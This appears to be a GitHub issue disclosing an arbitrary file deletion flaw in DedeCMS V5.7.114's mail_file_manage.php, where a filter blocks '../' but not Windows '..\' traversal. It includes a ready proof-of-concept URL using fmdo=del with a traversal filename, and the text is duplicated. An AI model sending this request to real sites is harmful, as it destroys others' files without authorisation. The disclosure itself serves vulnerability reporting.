You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This period of regular filter preg_replace (" # ([.] + [/] +) * # ", "", $filename).. / But it can be used in windows ..\ and can be used in linux .. Perform an operation to cause any file to be deleted
Demo:
Create a flag on disk d, and then perform the deletion test
Then access the following address to successfully delete any file http://ddcms.asd/dede/mail_file_manage.php?fmdo=del&filename=..\..\..\..\..\flag&activepath=%2Fdata%2F123
The text was updated successfully, but these errors were encountered:
Official website: https://www.dedecms.com/
Version: DedeCMS V5.7.114
DedeCMS-V5.7.114-UTF8.zip
Start at line 6 of the mail_file_manage.php file
This period of regular filter preg_replace (" # ([.] + [/] +) * # ", "", $filename).. / But it can be used in windows ..\ and can be used in linux .. Perform an operation to cause any file to be deleted
Demo:
Create a flag on disk d, and then perform the deletion test
Then access the following address to successfully delete any file
http://ddcms.asd/dede/mail_file_manage.php?fmdo=del&filename=..\..\..\..\..\flag&activepath=%2Fdata%2F123The text was updated successfully, but these errors were encountered: